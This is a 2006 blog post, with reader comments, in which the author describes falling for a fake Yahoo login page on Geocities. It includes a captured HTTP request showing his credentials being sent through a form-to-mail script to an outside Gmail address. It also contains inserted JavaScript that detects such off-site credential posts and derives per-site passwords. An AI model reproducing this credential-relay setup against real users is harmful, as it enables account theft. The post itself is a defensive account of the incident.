Sep 14 2006

Got Phished :(

Tags: Rajiv @ 9:01 am GMT-0700

I booted my laptop early this morning to get my daily dose of Google alerts. Navigating through the alerts I ended up at The Museum of Modern Betas, and browsing through its entries I chanced upon Google’s Firefox extension for detecting phishing: Safe Browsing. While I was going through their site, I noticed the Yahoo notification window show “Deeps is now online” and I was thinking to myself “What is this guy doing online so early in the morn?” (And may I ask what are YOU doing online?!)

Installing Google SafeBrowsing seems to be fraught with its own problems. The SafeBrowsing home page says that it can be installed as part of Google Toolbar only. Antitrust I say! Some sites say the download is available only in the US. Further googling revealed the URL: http://dl.google.com/firefox/google-safebrowsing.xpi

While I was installing the plugin (Firefox waits for a couple of seconds before enabling the install button … I wonder why?!), I see a message from Deeps:

Deeps: http://www.geocities.com/junebug585 :)

…and he logs out. I promptly clicked on the link which showed the page:


“Hmmm … password” I say. I ping Deeps … “Dood … it’s asking for password”. No response. Being a stickler for online security (ask my wife how I nag her into setting a different password for each site and make sure she does not note down her passwords anywhere!) I think to myself … “Hey! This could be a phishing site!” (what with me looking at the Google SafeBrowsing site just a few mins ago). “Very well”, I tell myself, “… the URL is Yahoo! Geocities, the logos and the layout look ok … Why would Deeps try to phish my Yahoo account details … what the hell … let’s try to login”. Key in the user id, pass … nothing happens. Back to the Yahoo home page. “D’oh! Have I been phished?!” With this nagging doubt I go have a shower … come back … notice Deeps has replied to my message:

Deeps: what login?
Deeps: did u a get any message from me?
Deeps: i did not send it..

“Oh God! I have been phished!! Change the password quickly.” Chirpy wifey: “Breakfast time!” “Oh God! Imagine after all my taunts … I’ve been phished … how am I going to tell her this?! Have I really been phished?!” So I decide to go back to the site and verify. LiveHTTPHeaders shows:

http://www2.fiberbit.net/form/mailto.cgi
POST /form/mailto.cgi HTTP/1.1
Host: www2.fiberbit.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.geocities.com/junebug585/?200614
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Mail_From=GOD&Mail_To=jawsy1%40gmail.com&Mail_Subject=Gift&Next_Page=http%3A%2F%2Fwww.yahoo.com&.pd=fpctx_ver%253d0&login=asdf&passwd=asdf

HTTP/1.x 302 Moved Temporarily
Date: Thu, 14 Sep 2006 04:01:30 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://www.yahoo.com
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from downloads.pramati.com
X-Cache-Lookup: MISS from downloads.pramati.com:3128
Connection: close

“Oh no! I really have been phished! Bugger has mailed my yahoo password to himself!! Change the password … change the password … change the password!”. Wifey, annoyed after waiting for me at the b’fast table: “Wot’chu doin buster?!” … where do I hide my face now?!
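The signals visible in the captured request above, written out as an added example (not part of the original post): it parses a LiveHTTPHeaders-style capture and reports a password field posted to a host outside a trusted list, a form submitted to a different host than the one that served it, and a form-to-mail relay. The field-name patterns and the trusted-host list are assumptions.

```javascript
// Added example: flag a captured form POST that sends credentials off-site.
// CAPTURE is abbreviated from the LiveHTTPHeaders output shown in the post.
const CAPTURE = [
  'POST /form/mailto.cgi HTTP/1.1',
  'Host: www2.fiberbit.net',
  'Referer: http://www.geocities.com/junebug585/?200614',
  'Content-Type: application/x-www-form-urlencoded',
  '',
  'Mail_From=GOD&Mail_To=jawsy1%40gmail.com&Mail_Subject=Gift' +
    '&Next_Page=http%3A%2F%2Fwww.yahoo.com&.pd=fpctx_ver%253d0&login=asdf&passwd=asdf',
].join('\n');

// Assumptions: these field-name patterns are illustrative, not exhaustive.
const CREDENTIAL_FIELD = /^(pass(wd|word)?|pwd)$/i;
const MAILER_FIELD = /^mail_to$/i;

function parseCapture(text) {
  const [head, body = ''] = text.split(/\r?\n\r?\n/);
  const lines = head.split(/\r?\n/);
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  // URLSearchParams decodes one level of percent-encoding, as the receiving CGI would.
  return { method, path, headers, form: new URLSearchParams(body.trim()) };
}

function analyzeCapture(text, trustedLoginHosts) {
  const req = parseCapture(text);
  const host = (req.headers.host || '').toLowerCase();
  const findings = [];
  const credFields = [...req.form.keys()].filter((k) => CREDENTIAL_FIELD.test(k));
  if (req.method === 'POST' && credFields.length && !trustedLoginHosts.includes(host)) {
    findings.push(`credential field(s) ${credFields.join(',')} posted to untrusted host ${host}`);
  }
  let refHost = '';
  try { refHost = new URL(req.headers.referer).hostname; } catch (_) { /* missing or invalid Referer */ }
  if (refHost && refHost !== host) {
    findings.push(`form served by ${refHost} submits to different host ${host}`);
  }
  for (const [k, v] of req.form) {
    if (MAILER_FIELD.test(k)) findings.push(`form-to-mail relay: fields are e-mailed to ${v}`);
  }
  return findings;
}
console.log(analyzeCapture(CAPTURE, ['login.yahoo.com']).join('\n'));
```

A cross-host form submission is common on legitimate sites too, so that finding is a reason to look closer; the password field going to an untrusted host is the decisive one.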

The phisher is not Deeps … someone phished his id and sent me the message. Maybe it is not even junebug585 whose Geocities site was used to phish for my account details … maybe that id was also phished and misused. Maybe it is not even jawsy1@gmail.com where my userid/pass have been mailed … maybe that id/pass also have been phished?! I wonder who all will receive a message from my id now and be phished!

Imagine the coincidence: I am finicky about internet security, I was just checking out Google’s SafeBrowsing and I got phished! “I took a chance typing my Yahoo id, surely I wouldn’t have taken a chance if the site asked for my bank account-nos/user-ids” I rationalize. But still … what if the phisher downloaded all my password reminder mails from my Yahoo mailbox??!!

All the best dad!

… now the painful part of reporting abuse to yahoo and gmail …


Update: Looks like I am not the first! … and looks like google pages are also being used for phishing. Google: yahoo geocities phishing


Update 1: Yahoo!’s solution for phishing?! (via Deeps):

———- Forwarded message ———-
From: Kalyan K Kumar
Date: Sep 14, 2006 11:04 AM
Subject: phishing
To: sammelan

keep an eye on those yahoo login look alike geocities links. don’t enter
yahoo password anywhere
other than login.yahoo.com
you can setup a sign in seal to protect partly.

http://protect.login.yahoo.com/


8 comments

  1. Sachin


    Very Interesting…

    And welcome back!

  2. Rupesh Kumar


    wow ! interesting.. still i can’t believe YOU got fished 😀

  3. Anonymous


    It’s all very real for sure… I found your comments quite relevant as I received a message from a friend with a link which I clicked same deal geocities page with Yahoo content, Duh… I entered my Yahoo info and lots of script errors and eventually a 404 not found came up. The hair on the back of my neck stood up and I immediately closed my browser emptied the temp files and then went and changed my Yahoo PW. I asked my friend if she sent me the link and her reply didn’t make sense and I rcvd another offline message today with the same link, needless to say I sent her the info back, looked at the html code on the link for what didn’t look right (I don’t know HTML but am computer savvy) and sure enough I found “www2.fiberbit.net” suspiciously located and decided to do a search where I found your comments… Thanks for sharing, as I was beginning to think I was being overly paranoid! etherialoneinnc

  4. Anonymous


    Hi there,

    Here is the message that I sent to my group members using my mother’s Yahoo ID.

    Dee No Longer Controls This Group !! ( I was phished by “mysuperheroine”)

    I worked very hard on this group, and it was a success; However all
    is not lost, you could join me in rebuilding an even better bbw101 !!
    http://www.groups.yahoo.com/group/bbw101_

    This group (http://www.groups.yahoo.com/group/bbw101) has no control
    since my password was stolen. Memberships had to be approved by me,
    therefore this group will never reach its potential. Thankfully, my
    mother joined this group, I’m using her ID to tell you about the
    intrusion. If mysuperheroine/rakhinrahbin, or who ever she may be by
    now, finds out… she may ban me from my own group. This person
    chats like your average good girlfriend in order to gain trust, and
    then she strikes! You’ll never know what hit ya! She often speaks of
    a stalker bf that she is terrified of, and how this guy can even see
    her IM’s (raise an eyebrow?). The next thing I knew, she sent me a
    link to see her “new pictures,” and there was the infamous spoofed
    yahoo login page! I didn’t pay attention, and signed in….. sending
    this cyber criminal my password to all of my personal yahoo
    everything! I was hurt, but I would like to move on with my members.
    Please read on to learn more about “phishing,” and how to protect
    yourself.

    This lady… or man for that matter was attracted to me, and wanted to introduce me to her brother. “She” even sent me a picture of the brother, which I now believe is her/him. Sounds confusing huh?

  5. Anonymous


    I feel what you are saying about being (“PHISHED.”) I was phished today. Now I have to make another myspace page. I hate the fact of that. I only looked up phish in GOOGLE to see how to prevent getting phished. How do you get phished? That still didn’t answer my question.

    comment left on February 14, 2007 at 8:10 p.m. HAPPY VALENTINE’S DAY

  6. Asgeir S. Nilsen


    I would recommend that you start to use a password generating bookmarklet for your web passwords. A good implementation is at http://labs.zarate.org/passwd/. What this does is simply to generate (via javascript running from a toolbar bookmark button) a password based on a master password you’re prompted for, and the site’s host name.

    This scheme ensures different passwords for different sites, and renders it impossible for a phishing site to get a correct password (since its host name would differ).

    If you develop web applications accepting passwords, I would recommend you to read my blog post Password authentication without revealing your password, which describes a scheme for hashing the password in the browser before it’s submitted to the server.
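The host-bound derivation described in the comment above, as an added example that is not part of the original comment and is not the linked bookmarklet's code: HMAC-SHA256 with base64url truncation is an assumed construction, and `derivePassword`, `phishOutcome` and the `phish.example` host are hypothetical names.

```javascript
// Added example: per-site password derived from a master password and the page's host name.
// Assumption: HMAC-SHA256 + base64url truncation; the linked bookmarklet may use a different algorithm.
const { createHmac } = require('node:crypto');

function siteHost(pageUrl) {
  // Use the host name as parsed from the URL, never text displayed by the page.
  // The URL parser lower-cases it and separates it from any "user@" prefix.
  return new URL(pageUrl).hostname.toLowerCase();
}

function derivePassword(master, pageUrl, length = 16) {
  const mac = createHmac('sha256', master).update(siteHost(pageUrl)).digest('base64url');
  return mac.slice(0, length);
}

// What a look-alike page receives when the derivation runs on it, and whether
// that string is the password the real site expects.
function phishOutcome(master, realUrl, phishUrl) {
  const captured = derivePassword(master, phishUrl);
  return { captured, worksOnRealSite: captured === derivePassword(master, realUrl) };
}

const REAL = 'https://login.yahoo.com/config/login';
// Geocities URL from the post; the second URL is constructed to show the "user@host" case.
console.log(phishOutcome('correct horse', REAL, 'http://www.geocities.com/junebug585/'));
console.log(phishOutcome('correct horse', REAL, 'http://login.yahoo.com@phish.example/'));
```

The look-alike page still receives a string, but it is the one derived for its own host name, so it does not open the account on the real site.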

  7. MARC


    It’s a fucking loser, me I have seen that, this fucking loser, I have really spammed this fake website phishing, sorry for my bad English, I’m French, it’s for that


  8. izulthea


    Hahahaaa…funny but dangerous! BE CAREFUL Bro!!
